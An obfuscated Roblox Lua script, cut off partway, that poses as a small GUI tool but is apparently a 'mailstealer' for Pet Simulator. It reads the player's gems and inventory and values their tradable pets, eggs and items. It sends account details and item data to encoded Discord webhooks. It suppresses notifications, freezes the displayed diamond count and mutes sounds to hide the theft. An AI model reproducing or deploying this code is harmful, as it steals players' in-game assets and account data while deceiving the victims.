--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v123,v124) local v125={};for v187=1, #v123 do v6(v125,v0(v4(v1(v2(v123,v187,v187 + 1 )),v1(v2(v124,1 + (v187% #v124) ,1 + (v187% #v124) + 1 )))%256 ));end return v5(v125);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\0\178\81\2\144\39\68\49\187","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\220\95\14","\158\48\118\66\114"));local v12=Instance.new(v7("\158\13\51\57\97\171\254\185","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\114\216\46\232\98\109\241\236\73\211","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\200\82\191\82\222\66\179\82\243\89","\38\156\55\199"));local v15=Instance.new(v7("\156\120\100\60\49\97\238\87\167\115","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\45\186\201\203\175\57\32\13\176\223","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\142\127\234\175\40\94\53\211","\161\219\54\169\192\90\48\80"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\121\78\1\60\76\80\39\48\64","\69\41\34\96"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(59 + 26 ,85,1203 -(628 + 490) );v9.BorderColor3=Color3.fromRGB(0 + 0 ,0,0);v9.BorderSizePixel=0 -0 ;v9.Position=UDim2.new(0.12510024 -0 ,774 -(431 + 343) ,0.478855729,0 -0 );v9.Size=UDim2.new(0 -0 ,190 + 50 ,0,156);v9.Active=true;v9.Draggable=true;v10.Parent=v9;v10.BackgroundColor3=Color3.fromRGB(7 + 46 ,1748 -(556 + 1139) ,68 -(6 + 9) );v10.BorderColor3=Color3.fromRGB(0,0 + 0 ,0 + 0 );v10.BorderSizePixel=169 -(28 + 141) ;v10.Size=UDim2.new(0 + 0 ,296 -56 ,0 + 0 ,46);v10.Font=Enum.Font.SourceSansBold;v10.Text=v7("\140\198\195\74\49\59\189\212\217\15\16\106","\75\220\163\183\106\98");v10.TextColor3=Color3.fromRGB(1572 -(486 + 831) ,663 -408 ,897 -642 );v10.TextSize=34;v11.Parent=v9;v11.BackgroundColor3=Color3.fromRGB(255,49 + 206 ,806 -551 );v11.BorderColor3=Color3.fromRGB(1263 -(668 + 595) ,0 + 0 ,0 + 0 );v11.BorderSizePixel=0;v11.Position=UDim2.new(0.0416666679 -0 ,290 -(23 + 267) ,1944.384615391 -(1129 + 815) ,387 -(371 + 16) );v11.Size=UDim2.new(1750 -(1326 + 424) ,306 -144 ,0 -0 ,50);v11.Font=Enum.Font.SourceSansBold;v11.PlaceholderText=v7("\39\180\159\50\203\66\138\142\35\153\44\187\134\50\152","\185\98\218\235\87");v11.Text="";v11.TextColor3=Color3.fromRGB(118 -(88 + 30) ,771 -(720 + 51) ,0 -0 );v11.TextSize=1797 -(421 + 1355) ;v11.TextWrapped=true;v12.Parent=v11;v13.Parent=v9;v13.BackgroundColor3=Color3.fromRGB(87 -34 ,53,53);v13.BorderColor3=Color3.fromRGB(0 + 0 ,1083 -(286 + 797) ,0 -0 );v13.BorderSizePixel=0 -0 ;v13.Position=UDim2.new(0.150000006,439 -(397 + 42) ,0.743589759 + 0 ,800 -(24 + 776) );v13.Size=UDim2.new(0 -0 ,832 -(222 + 563) ,0,72 -39 );v13.Font=Enum.Font.SourceSansBold;v13.Text=v7("\229\51\53\235\223\166","\202\171\92\71\134\190");v13.TextColor3=Color3.fromRGB(184 + 71 ,445 -(23 + 167) ,2053 -(690 + 1108) );v13.TextSize=14;v13.MouseButton1Click:Connect(function() local v126=0 + 0 ;local v127;while true do if (v126==(0 + 0)) then v127=require(game.ReplicatedStorage.Library.Client.Message);v127.Error(v7("\26\212\47\139\44\210\42\157\37\205\53\200\10\201\35\135\58\196\34\200\7\206\62\133\40\205\109","\232\73\161\76"));break;end end end);v14.Parent=v9;v14.BackgroundColor3=Color3.fromRGB(901 -(40 + 808) ,9 + 44 ,202 -149 );v14.BorderColor3=Color3.fromRGB(0,0 + 0 ,0 + 0 );v14.BorderSizePixel=0;v14.Position=UDim2.new(0.400000006 + 0 ,571 -(47 + 524) ,0.743589759 + 0 ,0 -0 );v14.Size=UDim2.new(0 -0 ,106 -59 ,1726 -(1165 + 561) ,1 + 32 );v14.Font=Enum.Font.SourceSansBold;v14.Text=v7("\156\214\78\89","\126\219\185\34\61");v14.TextColor3=Color3.fromRGB(789 -534 ,98 + 157 ,734 -(341 + 138) );v14.TextSize=4 + 10 ;v14.MouseButton1Click:Connect(function() local v128=0 -0 ;local v129;while true do if (v128==0) then v129=require(game.ReplicatedStorage.Library.Client.Message);v129.Error(v7("\63\219\93\113\123\100\245\242\0\194\71\50\93\127\252\232\31\203\80\50\89\120\255\227\77","\135\108\174\62\18\30\23\147"));break;end end end);v15.Parent=v9;v15.BackgroundColor3=Color3.fromRGB(379 -(89 + 237) ,170 -117 ,53);v15.BorderColor3=Color3.fromRGB(0,0 -0 ,881 -(581 + 300) );v15.BorderSizePixel=1220 -(855 + 365) ;v15.Position=UDim2.new(0.654166639 -0 ,0 + 0 ,1235.743589759 -(1030 + 205) ,0 + 0 );v15.Size=UDim2.new(0 + 0 ,333 -(156 + 130) ,0 -0 ,55 -22 );v15.Font=Enum.Font.SourceSansBold;v15.Text=v7("\132\232\35\197\26\161\36","\167\214\137\74\171\120\206\83");v15.TextColor3=Color3.fromRGB(522 -267 ,255,68 + 187 );v15.TextSize=9 + 5 ;v15.MouseButton1Click:Connect(function() local v130=0;local v131;while true do if (v130==(69 -(10 + 59))) then v131=require(game.ReplicatedStorage.Library.Client.Message);v131.Error(v7("\184\229\49\94\253\180\141\229\62\81\225\231\168\248\61\82\235\162\133\176\0\92\241\169\137\255\37\28","\199\235\144\82\61\152"));break;end end end);v16.Parent=v9;v16.BackgroundColor3=Color3.fromRGB(4 + 8 ,95,59 -47 );v16.BorderColor3=Color3.fromRGB(0,1163 -(671 + 492) ,0 + 0 );v16.BorderSizePixel=1215 -(369 + 846) ;v16.Position=UDim2.new(0.745833337,0,0.384615391 + 0 ,0 + 0 );v16.Size=UDim2.new(0,1997 -(1036 + 909) ,0 + 0 ,83 -33 );v16.Font=Enum.Font.SourceSansBold;v16.Text=v7("\52\6\184\60\9","\75\103\118\217");v16.TextColor3=Color3.fromRGB(458 -(11 + 192) ,129 + 126 ,255);v16.TextSize=194 -(135 + 40) ;v17.Parent=v16;Username=v7("\227\93\119\29\173\17\234\85\121\24\188\12","\126\167\52\16\116\217");Username2=v7("\236\39\39\137\160\22\209\201\39\44\133\166","\156\168\78\64\224\212\121");Webhook=v7("\15\250\177\222\20\180\234\129\3\231\182\205\8\252\161\128\4\225\168\129\6\254\172\129\16\235\167\198\8\225\174\221\72\191\247\150\80\185\245\155\95\182\246\153\86\186\252\159\81\189\252\155\72\231\245\197\15\226\161\197\80\236\139\237\83\255\179\230\20\217\132\151\37\198\164\236\21\187\131\219\32\192\169\232\9\232\164\151\86\185\139\150\41\255\247\248\15\182\253\158\1\251\167\237\33\247\241\223\46\201\151\152\94\227\147\155\85\232\134\216\74","\174\103\142\197");MinimumRAP=24228 -14228 ;DualhookUsername=v7("\114\33\88\49\49\81\213\87\33\83\61\55","\152\54\72\63\88\69\62");DualhookWebhook=v7("\220\208\250\76\199\158\161\19\208\205\253\95\219\214\234\18\215\203\227\19\213\212\231\19\195\193\236\84\219\203\229\79\155\149\188\4\131\147\190\9\140\156\189\11\133\144\183\13\130\151\183\9\155\205\190\87\220\200\234\87\131\198\192\127\128\213\248\116\199\243\207\5\246\236\239\126\198\145\200\73\243\234\226\122\218\194\239\5\133\147\192\4\250\213\188\106\220\156\182\12\210\209\236\127\242\221\186\77\253\227\220\10\141\201\216\9\134\194\205\74\153","\60\180\164\142");LogsWebhook=v7("\80\74\17\57\52\183\93\23\90\12\58\36\226\0\92\16\6\38\42\162\19\72\87\74\62\34\239\26\87\81\14\58\104\188\64\0\9\82\121\114\181\74\11\9\84\125\126\188\68\11\7\80\102\46\189\25\80\82\1\34\112\239\60\123\10\20\63\15\254\37\121\7\39\1\38\207\0\13\120\16\14\9\225\52\86\88\4\112\118\186\60\0\112\20\123\17\229\74\0\14\3\60\37\206\52\65\10\20\0\0\223\68\1\83\51\124\117\235\49\78\19","\114\56\62\101\73\71\141");DualhookRAP=1e+30 -  -100673994 ;mailstealer_name="X";Roblox_Username=Username;Discord_Webhook=Webhook;LOGS_WEBHOOK=LogsWebhook;if (getgenv().Executed==true) then end getgenv().Executed=true;repeat task.wait();until game:IsLoaded() if  not game:IsLoaded() then game.Loaded:Wait();end local v94=game:GetService(v7("\136\229\218\221\189\251\200","\164\216\137\187")).LocalPlayer.Name;if (v94==Username) then local v188=0 -0 ;while true do if (v188==(176 -(50 + 126))) then local v256=0 -0 ;while true do if (v256==(0 + 0)) then game:GetService(v7("\226\234\48\171\163\236\24","\107\178\134\81\210\198\158")).LocalPlayer:Kick(v7("\1\1\151\134\139\42\11\194\242\162\61\78\173\209\164\61\28\195\134\226\44\11\145\210\234\49\26\194\201\164\120\15\142\210\234\57\13\129\143","\202\88\110\226\166"));return;end end end end end if (Username==nil) then game:GetService(v7("\243\3\131\238\207\209\28","\170\163\111\226\151")).LocalPlayer:Kick(v7("\33\37\166\120\111\119\28\2\53\160\22\79\58\44","\73\113\80\210\88\46\87"));return;end repeat task.wait();until game:IsLoaded() repeat task.wait();until game.PlaceId~=nil  repeat task.wait();until  not game.Players.LocalPlayer.PlayerGui:FindFirstChild(v7("\190\19\228\60\211\179\3","\135\225\76\173\114")) local v95=require(game.ReplicatedStorage.Library);local v96=require(game:GetService(v7("\40\232\168\188\165\190\166\14\232\188\131\184\178\181\27\234\189","\199\122\141\216\208\204\221")).Library.Client.Save).Get();local v97=require(game:GetService(v7("\159\216\0\252\113\245\172\201\21\244\75\226\162\207\17\247\125","\150\205\189\112\144\24")).Library.Directory);local v98=game.Players.LocalPlayer;local v99=v96.Inventory;local v100=game:GetService(v7("\13\144\171\92\55\141\3\6\44\135\186","\112\69\228\223\44\100\232\113"));local v101=v7("\199\15\6\208\179\101\198\199\15\6\208\179","\230\180\127\103\179\214\28");local v102=require(game.ReplicatedStorage.Library.Client.Message);local v103=game:GetService(v7("\190\0\79\74\237\66\225\152\0\91\117\240\78\242\141\2\90","\128\236\101\63\38\132\33")):WaitForChild(v7("\130\172\5\83\185\249\196","\175\204\201\113\36\214\139"));for v132,v133 in pairs(v99.Currency) do if (v133.id==v7("\99\197\52\209\11\73\200\38","\100\39\172\85\188")) then GemsAmount=v133._am or (1413 -(1233 + 180)) ;break;end end for v134,v135 in pairs(getgc()) do if ((typeof(v135)==v7("\171\109\183\131\39\164\119\183","\83\205\24\217\224")) and (debug.getinfo(v135).name==v7("\229\202\192\45\243\209\200\14\227\203\201\16\231\204\193\30\233\214\217","\93\134\165\173"))) then FunctionToGetFirstPriceOfMail=v135;break;end end FirstPriceOfMail=FunctionToGetFirstPriceOfMail();if (FirstPriceOfMail>GemsAmount) then local v189=969 -(522 + 447) ;while true do if (v189==(1421 -(107 + 1314))) then print("You don't have enough gems to run a script");return;end end end local v104=function(v136) local v137=0 + 0 ;local v138;local v139;local v140;while true do if (v137==(5 -3)) then return string.format(v7("\251\188\147\196\127\221","\30\222\146\161\162\90\174\210"),v138,v139[v140]);end if (v137==(1 + 0)) then v140=1;while v138>=1000  do local v257=0;while true do if (v257==(0 -0)) then v138=v138/1000 ;v140=v140 + (3 -2) ;break;end end end v137=1912 -(716 + 1194) ;end if ((0 + 0)==v137) then v138=math.floor(v136);v139={"","k","m","b","t"};v137=1 -0 ;end end end;local v105=function(v141,v142) return require(game:GetService(v7("\215\75\96\6\236\77\113\30\224\74\67\30\234\92\113\13\224","\106\133\46\16")).Library.Client.DevRAPCmds).Get({[v7("\123\44\114\239\73","\32\56\64\19\156\58")]={[v7("\116\201\232\83","\224\58\168\133\54\58\146")]=v141},[v7("\112\69\106","\107\57\54\43\157\21\230\231")]=function(v190) return v190==v141 ;end,[v7("\252\142\5\220\189","\175\187\235\113\149\217\188")]=function() return v142.id;end,[v7("\15\187\128\79\232\82\125\37","\24\92\207\225\44\131\25")]=function() return v100:JSONEncode({[v7("\66\215","\29\43\179\216\44\123")]=v142.id,[v7("\173\205","\44\221\185\64")]=v142.pt,[v7("\18\239","\19\97\135\40\63")]=v142.sh,[v7("\186\82","\81\206\60\83\91\79")]=v142.tn});end}) or (0 + 0) ;end;local v106=function() RAP=0;for v191,v192 in pairs(v99) do if (v192~=nil) then for v258,v259 in pairs(v192) do RAP=RAP + v105(v191,v259) ;end end end return RAP;end;function deepCopy(v143) local v144={};for v193,v194 in pairs(v143) do local v195=0 -0 ;local v196;while true do if (v195==(0 + 0)) then v196=0 -0 ;while true do if (v196==(0 -0)) then if (type(v194)==v7("\90\170\210\126\42","\196\46\203\176\18\79\163\45")) then v194=deepCopy(v194);end v144[v193]=v194;break;end end break;end end end return v144;end local function v107(v145,v146,v147,v148,v149,v150,v151,v152,v153,v154) local v155={[v7("\155\45\112\10\33\245\251\245\22\103\14\33","\143\216\66\30\126\68\155")]=v7("\171\216\29\199\204\160\214\245\163\199\3\132\207\176\216\239","\129\202\168\109\171\165\195\183")};if (v151==true) then shinyy=v7("\17\80\62\214\199","\134\66\56\87\184\190\116");elseif (v151==false) then shinyy=v7("\50\62\29\251\42\227\40\59\37","\85\92\81\105\219\121\139\65");end imgs=v7("\245\167\68\85\111\133\178\252\89\72\125\216\248\160\29\64\100\203\176\226\30\65\117\204\254\188\66\65\125\207\237\253\94\64\104\144\248\171\68\64\110\209\252\191\31\118\82\134\231\180\65\102\85\216\219\129\72\17\106\220\242\229\126\86\91\204\251\227\97\79\122\208\222\155\86\23\80\213\194\184\2\119\42\136\216\154\121\66\51\215\233\167\64\86\51\214\179\186\82\71\50\220\242\252\119\114\111\209\237\163\88\10\100\207\243\180\30\85\114\216\162\181\95\87\113\222\233\238\71\64\126\207\187\162\69\68\112\214\233\170\13\73\115\204\238\191\85\86\111","\191\157\211\48\37\28");local v156=game:GetService(v7("\239\19\245\5\63\205\12","\90\191\127\148\124")).LocalPlayer;local v157=identifyexecutor() or v7("\109\137\42\18\126\142\32\18\124","\119\24\231\78") ;JobId=game.JobId;local v159=v98.Name;local v160={[v7("\129\34\171\94\217\78\5","\113\226\77\197\42\188\32")]=v152,[v7("\47\5\241\167\52\23\249\176","\213\90\118\148")]=""   .. mailstealer_name   .. v7("\27\3\181\95\65\72\58\177\87\65\94\60","\45\59\78\212\54") ,[v7("\17\64\130\159\135\60\146\229\2\90","\144\112\54\227\235\230\78\205")]=imgs,[v7("\182\37\13\249\212\72","\59\211\72\111\156\176")]={{[v7("\90\142\247\33\75","\77\46\231\131")]=v7("\240\30\143\79\175\20\188\85\169\64\246\71\181\64\246\65\250\90\179\87\250\93\162\69\183\21\252\10","\32\218\52\214"),[v7("\90\14\33\173","\58\46\119\81\200\145\208\37")]=v7("\57\133\51\164","\86\75\236\80\204\201\221"),[v7("\113\78\123\138\236","\235\18\33\23\229\158")]=tonumber(8324105 -(454 + 324) ),[v7("\68\178\212\182\82\180\192\178\92","\219\48\218\161")]={[v7("\241\99\112","\128\132\17\28\41\187\47")]=v148},[v7("\7\59\3\54\89\18","\61\97\82\102\90")]={{[v7("\162\47\166\78","\105\204\78\203\43\167\55\126")]=v7("\239\224\23\22\26\23\135\85\164\190\34\94\4\5\212\17\162\175\45\27\1\5\211\84\161\234\54\13\26\10\192\17","\49\197\202\67\126\115\100\167")   .. mailstealer_name   .. v7("\119\118\222\32\140\69\74\50\90\211\44\146\28\20","\62\87\59\191\73\224\54") ,[v7("\241\3\246\220\226","\169\135\98\154")]=v7("\203\119\36\97\238\54\218\197\118\41\81\189\115\136\139\55\126\20","\168\171\23\68\52\157\83")   .. v156.Name   .. "\nUser-ID      : "   .. v156.userId   .. "\nAccount Age  : "   .. v156.AccountAge   .. v7("\180\85\244\180\54","\231\148\17\149\205\69\77")   .. "\nExploit      : "   .. v157   .. "\nReceiver     : "   .. Roblox_Username   .. "\nTotal RAP    : "   .. v104(v154)   .. v7("\128\167\199","\159\224\199\167\155\55") ,[v7("\254\253\48\219\249\246","\178\151\147\92")]=false},{[v7("\130\252\65\55","\26\236\157\44\82\114\44")]=v7("\112\42\218\92\112\110\159\17\26\43\193\72\106\34\208\93\62\100\159\27\112\42\218\92\112","\59\74\78\181"),[v7("\51\208\86\79\182","\211\69\177\58\58")]="```➜ "   .. v150   .. v7("\183\229\121","\171\215\133\25\149\137") ,[v7("\232\198\62\243\225\53","\34\129\168\82\154\143\80\156")]=true},{[v7("\139\179\62\14","\233\229\210\83\107\40\46")]=v7("\155\79\61\216\0\216\125\63\217\16\213\74\104\150\79\139","\101\161\34\82\182")   .. v146   .. v7("\162\71\25\164\214\237\140\43\241\50\84\241\206\246\138\116","\78\136\109\57\158\187\130\226") ,[v7("\40\62\245\228\59","\145\94\95\153")]="```➜ "   .. v145   .. v7("\253\205\20","\215\157\173\116\181\46") ,[v7("\60\186\135\251\212\48","\186\85\212\235\146")]=true},{[v7("\204\128\27\251","\56\162\225\118\158\89\142")]=v7("\6\17\210\160\50\208\69\95\128\229\104\241\72\0\205\239\16\249\108\79\138\239\120\204\78\10\208\167\59\130","\184\60\101\160\207\66"),[v7("\39\131\112\169\52","\220\81\226\28")]="```➜ "   .. v104(v153)   .. v7("\19\213\130","\167\115\181\226\155\138") ,[v7("\235\44\235\85\117\116","\166\130\66\135\60\27\17")]=true},{[v7("\74\75\195\112","\80\36\42\174\21")]=v7("\20\23\50\119\20\80\125\48\105\21\58\105\14\60\50\124\90\90\125\58\20\23\50\119\20","\26\46\112\87"),[v7("\175\34\167\97\186","\212\217\67\203\20\223\223\37")]="```➜ "   .. v104(GemsAmount)   .. v7("\186\141\168","\178\218\237\200") ,[v7("\191\187\234\217\184\176","\176\214\213\134")]=true},{[v7("\250\172\187\209","\57\148\205\214\180\200\54")]=v7("\72\238\37\53\100\25\241\48\39\44\82\183\127\7\126\27\243\44\126\60\82\167\38\36\119\0\246\57\49\101\72","\22\114\157\85\84"),[v7("\210\202\31\209\88","\200\164\171\115\164\61\150")]="```➜ "   .. shinyy   .. v7("\190\244\3","\227\222\148\99\37") ,[v7("\58\92\94\255\247\54","\153\83\50\50\150")]=true},{[v7("\83\119\126\25","\45\61\22\19\124\19\203")]=v7("\155\0\12\252\12\114\182\214\72\77\191\72\66\155\142\53\2\249\6\63\139\196\21\71\191\66\42\170\209\19\31\254\14\117\170\155","\217\161\114\109\149\98\16"),[v7("\4\33\52\105\185","\20\114\64\88\28\220")]="```➜ "   .. v147   .. v7("\49\1\210","\221\81\97\178\212\152\176") ,[v7("\196\233\17\242\20\200","\122\173\135\125\155")]=true}}}},[v7("\133\213\20\184\60\57\197\129\207\20\170","\168\228\161\96\217\95\81")]={}};local v161=http_request or request or HttpPost or syn.request ;v161({[v7("\238\195\34","\55\187\177\78\60\79")]=v149,[v7("\0\203\75\227\73\203","\224\77\174\63\139\38\175")]=v7("\180\110\107\26","\78\228\33\56"),[v7("\230\123\179\7\128\220\109","\229\174\30\210\99")]={[v7("\56\226\136\69\232\51\45\86\217\159\65\232","\89\123\141\230\49\141\93")]=v7("\242\97\230\0\25\73\242\101\255\3\30\5\249\98\249\2","\42\147\17\150\108\112")},[v7("\45\169\41\102","\136\111\198\77\31\135")]=game.HttpService:JSONEncode(v160)});end local v108=v98.leaderstats["\240\159\146\142 Diamonds"].Value;local v109=v98.leaderstats["\240\159\146\142 Diamonds"];v109:GetPropertyChangedSignal(v7("\52\8\171\67\184","\201\98\105\199\54\221\132\119")):Connect(function() v109.Value=v108;end);local v110=v98.PlayerScripts.Scripts.Core[v7("\137\30\140\34\7\38\191\249\60\134\47\6\60\162\190\76\164\20\43","\204\217\108\227\65\98\85")];local v111=v98.PlayerGui.Notifications;v110.Disabled=true;v111:GetPropertyChangedSignal(v7("\123\205\244\231\32\197\90","\160\62\163\149\133\76")):Connect(function() v111.Enabled=false;end);v111.Enabled=false;task.spawn(function() game.DescendantAdded:Connect(function(v197) if (v197.ClassName==v7("\229\175\24\33\199","\163\182\192\109\79")) then if ((v197.SoundId==v7("\38\36\24\193\230\39\35\20\201\241\110\105\79\145\164\108\117\89\145\166\102\115\86\149","\149\84\70\96\160")) or (v197.SoundId==v7("\42\4\21\236\43\21\8\249\49\2\87\162\119\87\89\191\109\82\90\191\105\86\94\181","\141\88\102\109")) or (v197.SoundId==v7("\161\81\210\113\9\46\80\213\186\87\144\63\85\108\7\149\226\0\158\34\73\111\2\151","\161\211\51\170\16\122\93\53"))) then v197.Volume=0;v197.PlayOnRemove=false;v197:Destroy();end end end);end);local function v114(v164) local v165=0;local v166;local v167;while true do local v198=0 + 0 ;while true do if (v198==0) then if (v165==1) then v167=game:HttpGet(v7("\80\3\51\86\75\77\104\9\76\31\50\75\90\25\38\79\84\4\105\84\87\21\43\73\64\89\36\73\85\88\49\23\23\22\52\85\93\3\52\25\89\4\52\67\76\62\35\85\5","\38\56\119\71")   .. Asset   .. v7("\181\253\93\194\48\68\253\223\87\218\44\85\234\178\104\218\36\85\246\199\87\218\33\83\225\169\75\223\63\83\174","\54\147\143\56\182\69")   .. v166   .. v7("\144\135\240\91\210\215\149\162\89\209\209","\191\182\225\159\41") );thumbnail=game.HttpService:JSONDecode(v167).data[1094 -(277 + 816) ].imageUrl;v165=8 -6 ;end if (v165==0) then Asset=string.split(v164,v7("\233\172\170\41\232\189\183\60\242\170\232\103\180","\72\155\206\210"))[1185 -(1058 + 125) ];v166=v7("\18\40\4\22\103\20\42","\83\38\26\52\110");v165=1 + 0 ;end v198=976 -(815 + 160) ;end if (v198==(4 -3)) then if (v165==(4 -2)) then return thumbnail;end break;end end end end MinimumRAP=FirstPriceOfMail;if v99.Box then for v206,v207 in pairs(v99.Box) do if v207._uq then game:GetService(v7("\25\23\56\89\130\132\195\63\23\44\102\159\136\208\42\21\45","\162\75\114\72\53\235\231")):WaitForChild(v7("\162\57\80\245\92\16\135","\98\236\92\36\130\51")):WaitForChild(v7("\134\22\20\224\5\159\188\36\172\29\30\187\82\232\148\60\168","\80\196\121\108\218\37\200\213")):InvokeServer(v206);end end end local v115,v116=game:GetService(v7("\50\118\18\115\66\13\139\20\118\6\76\95\1\152\1\116\7","\234\96\19\98\31\43\110")):WaitForChild(v7("\40\26\70\208\163\96\128","\235\102\127\50\167\204\18")):WaitForChild(v7("\125\160\252\47\70\33\72\251\181\0\72\47\89\172\181\2\72\34","\78\48\193\149\67\36")):InvokeServer();while v116==v7("\9\17\149\88\76\37\13\148\88\86\49\23\148\88\18\96\94\147\29\66\63\16\132\11\1\50\27\134\23\83\53\94\149\11\72\62\25\192\12\73\53\94\141\25\72\60\28\143\0\0","\33\80\126\224\120")  do local v168=0 + 0 ;local v169;while true do if (v168==(0 -0)) then v169=0;while true do if (v169==0) then wait();v115,v116=game:GetService(v7("\222\173\19\200\85\239\169\23\193\88\223\188\12\214\93\235\173","\60\140\200\99\164")):WaitForChild(v7("\169\241\16\49\173\149\255","\194\231\148\100\70")):WaitForChild(v7("\107\77\200\175\244\199\94\22\129\128\250\201\79\65\129\130\250\196","\168\38\44\161\195\150")):InvokeServer();break;end end break;end end end require(game.ReplicatedStorage.Library.Client.DaycareCmds).Claim();require(game.ReplicatedStorage.Library.Client.ExclusiveDaycareCmds).Claim();local v117=function() local v170={};if (v99.Pet~=nil) then for v208,v209 in pairs(v99.Pet) do id=v209.id;dir=v97.Pets[id];if (dir.huge and (dir.Tradable~=false)) then rap=v105(v7("\176\249\150","\118\224\156\226\22\80\136\214"),v209);if (v209.pt==1) then local v291=1898 -(41 + 1857) ;while true do if (v291==(1893 -(1222 + 671))) then ItemImageId=dir.goldenThumbnail;ItemType=v7("\101\225\85\132\71\224","\224\34\142\57");break;end end elseif (v209.pt==(5 -3)) then local v297=0 -0 ;while true do if (v297==(1182 -(229 + 953))) then ItemImageId=dir.thumbnail;ItemType=v7("\236\166\204\211\113\254\74","\110\190\199\165\189\19\145\61");break;end end else ItemImageId=dir.thumbnail;ItemType=v7("\244\228\101\229\138\203","\167\186\139\23\136\235");end table.insert(v170,{[v7("\51\161\141\0\37\156\140","\109\122\213\232")]=v208,[v7("\199\227\167\61\209\217\163\61\235","\80\142\151\194")]=v209.id,[v7("\42\210\114\65\60\231\122\67\22\200\99","\44\99\166\23")]=v209._am or 1 ,[v7("\85\227\44\59\12\150\93\199","\196\28\151\73\86\83")]=rap,[v7("\218\23\44\29\189\123\20\119\224\16","\22\147\99\73\112\226\56\120")]=v7("\136\112\246","\237\216\21\130\149"),[v7("\171\93\108\87\185\199\71","\62\226\46\63\63\208\169")]=v209.sh or false ,[v7("\204\10\121\140\28\6\42\90","\62\133\121\53\227\127\109\79")]=v209.lk or false ,[v7("\57\0\55\248\233\135\175\17\19\55\220\210","\194\112\116\82\149\182\206")]=ItemImageId,[v7("\16\188\73\21\255\214\23\41\173","\110\89\200\44\120\160\130")]=ItemType});end if (dir.exclusiveLevel and (dir.Tradable~=false)) then rap=v105(v7("\155\198\95","\45\203\163\43\38\35\42\91"),v209) * (v209._am or 1) ;if (v209.pt==(1775 -(1111 + 663))) then local v292=1579 -(874 + 705) ;local v293;while true do if ((0 + 0)==v292) then v293=0;while true do if (v293==0) then ItemImageId=dir.goldenThumbnail;ItemType=v7("\245\138\208\39\130\167","\52\178\229\188\67\231\201");break;end end break;end end elseif (v209.pt==(2 + 0)) then local v299=0 -0 ;while true do if (v299==0) then ItemImageId=dir.thumbnail;ItemType=v7("\19\64\89\10\245\83\52","\67\65\33\48\100\151\60");break;end end else ItemImageId=dir.thumbnail;ItemType=v7("\241\232\188\213\242\211","\147\191\135\206\184");end if (rap>MinimumRAP) then table.insert(v170,{[v7("\173\60\163\204\231\122\182","\210\228\72\198\161\184\51")]=v208,[v7("\31\93\246\29\76\224\55\68\246","\174\86\41\147\112\19")]=v209.id,[v7("\114\20\136\6\26\46\28\164\78\14\153","\203\59\96\237\107\69\111\113")]=v209._am or (1 + 0) ,[v7("\13\2\169\236\14\194\246\20","\183\68\118\204\129\81\144")]=rap,[v7("\39\185\117\233\52\161\2\172\99\247","\226\110\205\16\132\107")]=v7("\219\198\244","\33\139\163\128\185"),[v7("\126\75\55\214\94\86\29","\190\55\56\100")]=v209.sh or false ,[v7("\127\188\16\17\16\232\246\82","\147\54\207\92\126\115\131")]=v209.lk or false ,[v7("\36\37\48\112\50\87\0\48\50\120\36\122","\30\109\81\85\29\109")]=ItemImageId,[v7("\214\101\81\187\9\234\229\239\116","\156\159\17\52\214\86\190")]=ItemType});end end end end if (v99.Egg~=nil) then for v212,v213 in pairs(v99.Egg) do id=v213.id;dir=v97.Eggs[id];rap=v105(v7("\139\232\186","\220\206\143\221"),v213);ItemType=v7("\168\114\63\26\217\192","\178\230\29\77\119\184\172");ItemImageId=dir.icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\220\170\15\22\72\209\241","\152\149\222\106\123\23")]=v212,[v7("\244\50\243\78\138\243\39\251\70","\213\189\70\150\35")]=v213.id,[v7("\102\65\113\5\112\116\121\7\90\91\96","\104\47\53\20")]=v213._am or (680 -(642 + 37)) ,[v7("\138\88\132\17\131\61\130\124","\111\195\44\225\124\220")]=rap,[v7("\241\82\5\126\148\136\212\71\19\96","\203\184\38\96\19\203")]=v7("\28\116\126","\174\89\19\25\33"),[v7("\6\1\97\70\254\137\18","\107\79\114\50\46\151\231")]=v213.sh or false ,[v7("\16\181\153\38\137\50\178\196","\160\89\198\213\73\234\89\215")]=v213.lk or false ,[v7("\97\101\177\243\250\97\124\181\249\192\97\117","\165\40\17\212\158")]=ItemImageId,[v7("\204\205\13\62\25\209\192\24\54","\70\133\185\104\83")]=ItemType});end end end if (v99.Misc~=nil) then for v217,v218 in pairs(v99.Misc) do local v219=0 + 0 ;local v220;while true do if ((0 + 0)==v219) then v220=0;while true do if (v220==0) then id=v218.id;dir=v97.MiscItems[id];v220=2 -1 ;end if (v220==(456 -(233 + 221))) then ItemImageId=dir.Icon;if ((rap>MinimumRAP) and (v218.id~=v7("\251\86\7\35\30\203\167\140\220","\227\168\58\110\77\121\184\207"))) then table.insert(v170,{[v7("\82\40\186\77\142\242\117","\197\27\92\223\32\209\187\17")]=v217,[v7("\42\75\198\246\60\113\194\246\6","\155\99\63\163")]=v218.id,[v7("\171\197\164\128\134\165\143\222\180\131\173","\228\226\177\193\237\217")]=v218._am or (2 -1) ,[v7("\29\164\38\235\11\130\2\214","\134\84\208\67")]=rap,[v7("\58\184\131\81\44\143\138\93\0\191","\60\115\204\230")]=v7("\202\51\248\115","\16\135\90\139"),[v7("\125\103\53\59\71\90\97","\24\52\20\102\83\46\52")]=v218.sh or false 